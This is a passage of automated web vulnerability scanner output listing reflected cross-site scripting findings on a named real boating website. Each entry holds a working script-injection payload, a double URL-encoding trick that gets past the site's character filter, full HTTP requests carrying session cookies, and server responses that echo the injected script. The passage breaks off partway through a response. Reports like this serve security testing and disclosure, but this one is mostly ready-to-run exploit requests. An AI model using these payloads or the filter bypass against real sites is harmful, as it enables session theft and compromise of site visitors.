The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52975%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edb3c7c9fe1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52975"><script>alert(1)</script>db3c7c9fe1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /columns-blogs/under-way?52975%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edb3c7c9fe1c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/under-way?52975"><script>alert(1)</script>db3c7c9fe1c=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1391. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/contact-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5850%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eacf387a70db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5850"><script>alert(1)</script>acf387a70db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /contact-us?c5850%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eacf387a70db=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/contact-us?c5850"><script>alert(1)</script>acf387a70db=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1392. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89ad6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3cbaba1e44d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89ad6"><script>alert(1)</script>3cbaba1e44d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features?89ad6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3cbaba1e44d=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

4.1393. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/in-depth

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae44c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8d35706e11a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae44c"><script>alert(1)</script>8d35706e11a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/in-depth?ae44c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8d35706e11a=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/in-depth?ae44c"><script>alert(1)</script>8d35706e11a=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1394. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/justyesterday

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 314be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e162c4d495b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 314be"><script>alert(1)</script>162c4d495b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/justyesterday?314be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e162c4d495b9=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/justyesterday?314be"><script>alert(1)</script>162c4d495b9=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1395. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/lifestyle

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc1e7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e981f5a3f63a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cc1e7"><script>alert(1)</script>981f5a3f63a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/lifestyle?cc1e7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e981f5a3f63a=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/lifestyle?cc1e7"><script>alert(1)</script>981f5a3f63a=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1396. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/profiles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b6d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed38ae411bb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7b6d3"><script>alert(1)</script>d38ae411bb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/profiles?7b6d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed38ae411bb6=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/profiles?7b6d3"><script>alert(1)</script>d38ae411bb6=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1397. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/technical

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22fdb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60ec098217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22fdb"><script>alert(1)</script>60ec098217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/technical?22fdb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60ec098217=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/technical?22fdb"><script>alert(1)</script>60ec098217=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1398. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/type-of-boat

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fc8ed8b81c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17b36"><script>alert(1)</script>9fc8ed8b81c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/type-of-boat?17b36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fc8ed8b81c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/type-of-boat?17b36"><script>alert(1)</script>9fc8ed8b81c=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1399. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b17a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea893ecab85e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b17a"><script>alert(1)</script>a893ecab85e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111&9b17a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea893ecab85e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:49:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:49:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/buy-a-boat?9b17a"><script>alert(1)</script>a893ecab85e=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1400. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [image_x parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the image_x request parameter is copied into the HTML document as plain text between tags. The payload 4eeec<script>alert(1)</script>a46501efcd6 was submitted in the image_x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=04eeec<script>alert(1)</script>a46501efcd6&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0px;
   left: 04eeec<script>alert(1)</script>a46501efcd6px;
   position: absolute;
   display: block;
}

div.gk_news_image_1_wrapper h2 {
   margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
   font:normal 28px Geneva, Arial, Helvetica, sans-ser
...[SNIP]...

4.1401. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [image_y parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the image_y request parameter is copied into the HTML document as plain text between tags. The payload e255c<script>alert(1)</script>249d8d38b12 was submitted in the image_y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0e255c<script>alert(1)</script>249d8d38b12&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0e255c<script>alert(1)</script>249d8d38b12px;
   left: 0px;
   position: absolute;
   display: block;
}

div.gk_news_image_1_wrapper h2 {
   margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
   font:normal 28px Geneva, Arial, Helvet
...[SNIP]...

4.1402. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [module_height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the module_height request parameter is copied into the HTML document as plain text between tags. The payload 83595<script>alert(1)</script>8968cd8d5c9 was submitted in the module_height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=27083595<script>alert(1)</script>8968cd8d5c9&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
